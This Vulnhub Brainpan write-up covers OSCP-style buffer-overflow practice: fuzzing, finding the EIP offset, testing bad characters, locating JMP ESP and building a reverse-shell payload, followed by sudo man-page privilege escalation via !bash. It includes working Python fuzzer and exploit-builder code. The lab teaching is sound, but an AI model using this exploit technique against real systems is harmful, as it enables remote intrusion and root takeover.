Vulnhub virtual machine; OSCP buffer-overflow prep. “Where we’re going we don’t need roads.” This box is a good test of buffer-overflow skills: you will craft an overflow that leads to a reverse shell. Privilege escalation on the box comes from a sudo-allowed utility that opens a manual page.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you own and/or have express written permission to test. Use the information at your own risk.
By continuing to read, you acknowledge the aforementioned risks and responsibilities.
Discover the VM on the network
target: 192.168.56.110
Enumeration
Nmap Scan
The scan identifies two interesting ports: 9999, an unknown service whose banner reads “WELCOME TO BRAINPAN”, and 10000, a Python SimpleHTTPServer (the scan output also showed some base64-looking content).
Navigating to port 10000 leads to a page with a single image.
Inspecting the source: nothing much to look at.
Connecting to port 9999
We get a password prompt, which we could try to brute force. Never mind: after several attempts the connection is simply refused.
webmin is possibly an interesting username.
Continuing enumeration with dirbuster.
Navigating to /bin, a brainpan.exe is discovered; download it locally to investigate.
It’s a PE32 (Windows) executable: looks like we’ll be doing some reverse engineering.
Reverse Engineering
Opening the file with wine:
It listens on port 9999, so let’s try connecting to localhost on 9999.
We get a response from brainpan.exe on port 9999.
Attempting a password of “password”: the word looks to have pushed 9 bytes into the buffer (the 8 characters plus the trailing newline).
Load brainpan.exe into OllyDbg and press Start twice to run it. A secondary (popup) window shows the application running correctly and awaiting connections on port 9999.
Goal: gain control of EIP, point it at a JMP ESP instruction so that execution lands on the data we placed at ESP, and put reverse-shell shellcode there.
Video: fuzz.py
Create bfuzz.py (a simple fuzzer that sends increasingly long strings to the password prompt) and launch it against the application.
brainpan.exe responds to each attempt until the program finally crashes at around 600 bytes.
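Here is a Python fuzzer in the spirit of bfuzz.py; it is an added example, not the page’s script. It assumes the target and port from the scan above (192.168.56.110:9999), that the service prints a banner and prompt before reading one line, and that a crashed service shows up as a refused or timed-out connection; the start, step and limit values are arbitrary choices. The loop is kept separate from the socket code so it can be driven by a fake sender when the target is not reachable.

```python
import socket

TARGET = ("192.168.56.110", 9999)   # from the nmap scan above; adjust for your lab


def send_password(payload, target=TARGET, timeout=3.0):
    """Send one password attempt and return the service's reply.

    Raises OSError (connection refused) or socket.timeout if the service
    is no longer answering, which is what the fuzzer treats as a crash."""
    with socket.create_connection(target, timeout=timeout) as s:
        s.recv(1024)                 # banner and ">> " prompt (assumed)
        s.sendall(payload + b"\n")
        return s.recv(1024)          # whatever the service replies while alive


def fuzz(send, start=100, step=100, limit=2000):
    """Send buffers of 'A' of growing length until the service stops answering.

    `send` is any callable that takes the payload bytes and raises on failure.
    Returns (last_ok, first_fail); first_fail is None if the limit was reached
    without a crash."""
    last_ok = 0
    for n in range(start, limit + 1, step):
        try:
            send(b"A" * n)
        except (OSError, socket.timeout):
            return last_ok, n
        last_ok = n
    return last_ok, None


if __name__ == "__main__":
    ok, crashed = fuzz(send_password)
    print("last length answered: %d, first length that crashed: %s" % (ok, crashed))
```

Once you have the first length that crashes, restart the target in the debugger before every later run; a crashed brainpan.exe does not come back on its own.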
Create a 600-byte pattern with Metasploit’s pattern_create.rb and copy its output.
Add it to the buffer skeleton file.
Buffer skeleton file (buff-skel.py):
Add the pattern_create string to buff-skel.py.
Now the buffer is 600 bytes of non-repeating data.
Execute buff-skel.py to find exactly where the application crashes.
Verify in OllyDbg that the data reached the application.
The application is confirmed killed by an access violation when executing [35724134]:
EIP = 35724134 (highlighted in the registers pane)
Find the exact offset of this EIP value with pattern_offset.rb:
Offset = 524: exactly 524 bytes precede the four bytes that land in EIP, so bytes 525 to 528 of the buffer become the return address.
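To make the offset arithmetic concrete, here is a small Python reimplementation of Metasploit’s pattern_create and pattern_offset. It is an added example, not the page’s script, and it does not call the Metasploit tools; it generates the same Aa0Aa1… pattern and recovers the 524 from the EIP value 35724134 seen in OllyDbg. The one thing it relies on beyond the page is that x86 is little-endian, so the register value is read from the buffer bytes in reverse order.

```python
import string
import struct


def pattern_create(length):
    """Return `length` bytes of the Metasploit cyclic pattern.

    Each 3-byte chunk is Upper+lower+digit with the digit cycling fastest,
    so every 4-byte window is unique across the full 20280-byte cycle."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern longer than 20280 bytes would repeat")


def pattern_offset(eip_value, length=600):
    """Offset of the four bytes that ended up in EIP, or None if not found.

    `eip_value` is the register as OllyDbg shows it (0x35724134). x86 loads
    it little-endian, so those bytes sit in the buffer as 34 41 72 35, i.e.
    the text "4Ar5"; struct.pack("<I") reproduces that order."""
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    print(pattern_offset(0x35724134))   # the page's value: 524
```

The same function answers the EBP question: feeding it the EBP value from the pattern crash gives the offset four bytes earlier, which is a quick sanity check that the stack frame looks the way the A/B/C test later assumes.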
Adjust buff-skel.py to send exactly 524 “A”s followed by four “B”s to brainpan.
We want to fill the EIP value with something recognisable so we can determine whether we’ve taken it over.
Restart the application in OllyDbg.
Crash the application with buff-skel.py.
Application crashed. OllyDbg now shows that we have replaced the registers:
EBP: 41414141 = A’s, EIP: 42424242 = B’s
Follow ESP in the dump:
This brings us to the C’s, and this is the area where our generated shellcode will be placed.
Shellcode is normally around 300 bytes, so we need at least that much room here.
Restart the application in OllyDbg.
Currently we have only about 60 bytes of C’s to work with, so we need to add more space to the C area by changing the total buffer length from 600 to 1400.
Run buff-skel.py: there is now a significant run of C’s and plenty of space for the shellcode.
Keep in mind bad characters for buffer overflows: https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
A great write-up by Georgia Weidman. #hailGeorgia
Testing For Bad Characters
Add the badchars (every byte value from \x01 to \xff; \x00 is left out because we already know it is a no-go) to buff-skel.py after the A’s and B’s.
Run buff-skel.py with the badchars.
The hex dump at ESP shows the badchars exactly after the A’s and B’s. If there is a gap in the sequence (a byte missing, or the dump cut short), the byte that should be there is bad; remove it from the list and run again until the whole sequence lands intact.
Note: if the shellcode doesn’t work, it’s probably a bad character stopping it.
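The bad-character loop described above, as an added Python example (not the page’s buff-skel.py). It builds the \x01 to \xff sequence, compares what was sent with what the debugger shows at ESP, and repeats with the offending byte removed until the whole sequence lands intact. The `observe` callable is an assumption: in practice it is you pasting the bytes from OllyDbg’s dump pane; here a constructed stand-in that cuts the input at \x0a and drops \x0d plays the target, which is the page’s general procedure rather than Brainpan’s actual bad-character set (the page only establishes \x00).

```python
def badchar_string(exclude=(0x00,)):
    """Every byte value 0x00-0xff except the ones in `exclude`, in order.
    0x00 is excluded by default: the page already knows it is a no-go."""
    return bytes(b for b in range(256) if b not in exclude)


def first_bad_char(sent, observed):
    """Return the first sent byte that did not land in memory intact, or None.

    `observed` is what the debugger shows starting at the first badchar.
    A dropped byte shows up as a shift (or the dump ending early); a mangled
    byte shows up as a mismatch in place. Either way the first index that
    disagrees points at the culprit."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_all_bad_chars(observe, known=(0x00,)):
    """Repeat the send/inspect cycle until the sequence lands intact.

    `observe(sent)` must return the bytes found at ESP after sending `sent`
    (in practice: you, reading OllyDbg's dump). Returns the sorted list of
    bad bytes, including the ones already known."""
    bad = set(known)
    while True:
        sent = badchar_string(bad)
        culprit = first_bad_char(sent, observe(sent))
        if culprit is None:
            return sorted(bad)
        bad.add(culprit)


def format_badchars(bad):
    """Render the list the way msfvenom's -b option expects, e.g. '\\x00\\x0a'."""
    return "".join("\\x%02x" % b for b in bad)


def fake_target(sent):
    """Constructed stand-in for the debugger dump (NOT brainpan's behaviour):
    the input is cut at a newline (0x0a) and carriage returns (0x0d) vanish."""
    return sent.split(b"\x0a")[0].replace(b"\x0d", b"")


if __name__ == "__main__":
    print(format_badchars(find_all_bad_chars(fake_target)))   # \x00\x0a\x0d
```

Removing only the first offender and re-running matters: once a byte is dropped, everything after it shifts, so a single comparison would blame every later byte as well.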
Restart OllyDbg.
Finding the JMP ESP
Locate a JMP ESP instruction in the main module:
Results:
JMP ESP = 311712f3. Returning into this address makes the CPU jump to ESP, which points at our C’s, so our shellcode will execute from there. The address contains no \x00 (our known bad character), and it has to be written into the buffer little-endian (\xf3\x12\x17\x31).
Adjust buff-skel.py to add the JMP ESP address.
Before executing, set a breakpoint in OllyDbg on the JMP ESP so that execution stops there when the overflow hits.
Execute buff-skel.py: the breakpoint is hit, and the JMP lands right on the C’s where our shellcode will be.
Creating Shellcode Payload
Generate reverse-shell shellcode with msfvenom.
-b specifies the bad characters to avoid (we know \x00 is a no-go).
Add the shellcode to buff-skel.py.
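Putting the pieces together, here is an added Python exploit builder (not the page’s buff-skel.py) that assembles the final buffer from the values found above: 524 bytes to EIP, the JMP ESP at 311712f3 packed little-endian, a short NOP sled, then the shellcode, padded back out to the 1400 bytes that were already tested. The shellcode here is a constructed placeholder of INT3 (\xcc) bytes so the layout can be confirmed in OllyDbg; paste the msfvenom output in its place. The sled length, the 1400 total and the target address are assumptions for the lab.

```python
import socket
import struct

TARGET = ("192.168.56.110", 9999)   # from the scan; adjust for your lab
OFFSET = 524                         # bytes before EIP (pattern_offset result)
JMP_ESP = 0x311712f3                 # JMP ESP found in brainpan.exe
BAD_CHARS = b"\x00"                  # the only bad char established on the page
TOTAL = 1400                         # buffer length already shown to leave room

# Constructed placeholder: INT3 breakpoints. If the layout is right, OllyDbg
# stops here right after the JMP ESP; replace with msfvenom -b '\x00' output.
PLACEHOLDER_SHELLCODE = b"\xcc" * 4


def bad_chars_in(data, bad=BAD_CHARS):
    """Sorted list of bad byte values present in `data` (empty if clean)."""
    return sorted(set(data) & set(bad))


def build_exploit(shellcode, offset=OFFSET, jmp_esp=JMP_ESP, nops=16, total=TOTAL):
    """Assemble [offset x 'A'][JMP ESP little-endian][NOP sled][shellcode][C padding].

    0x311712f3 must be written as f3 12 17 31 because x86 reads the return
    address little-endian. The NOP sled gives some slack if ESP is not exactly
    where it was in the debugger. Padding keeps the total at the size that
    was already shown to fit."""
    ret = struct.pack("<I", jmp_esp)
    for name, part in (("return address", ret), ("shellcode", shellcode)):
        found = bad_chars_in(part)
        if found:
            raise ValueError("%s contains bad chars: %s"
                             % (name, ["\\x%02x" % b for b in found]))
    buf = b"A" * offset + ret + b"\x90" * nops + shellcode
    if len(buf) > total:
        raise ValueError("payload is %d bytes, over the %d tested" % (len(buf), total))
    return buf + b"C" * (total - len(buf))


def send_exploit(buf, target=TARGET):
    """Deliver the buffer as the password; the listener catches the shell."""
    with socket.create_connection(target, timeout=5) as s:
        s.recv(1024)               # banner and prompt
        s.sendall(buf + b"\n")


if __name__ == "__main__":
    send_exploit(build_exploit(PLACEHOLDER_SHELLCODE))
```

Run it once with the placeholder and the JMP ESP breakpoint still set: stepping past the jump should land on the \x90s and then trap on the first \xcc. Only then swap in the real shellcode and clear the breakpoint, otherwise the debugger, not your listener, gets the shell.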
Setup NC Listener
In some cases the nc listener just doesn’t function properly, and that’s when you switch to Metasploit’s handler.
Setup Metasploit Listener
Note: for the OSCP exam you are allowed to use the Metasploit multi/handler listener as much as you want.
Launch Metasploit (fastest way) and configure the multi/handler listener.
Priv-Esc
Connection made after the buffer overflow.
Upgrade to a TTY.
Quick check of sudo abilities:
The application anasi_util can be run as root.
It looks to be a man-page viewer (manual [command]), which looks like a good way to escalate.
Escalation via vi:
Root
Enter the shell escape sequence !bash.
Gimme the loot!
Bring me the root!
-exec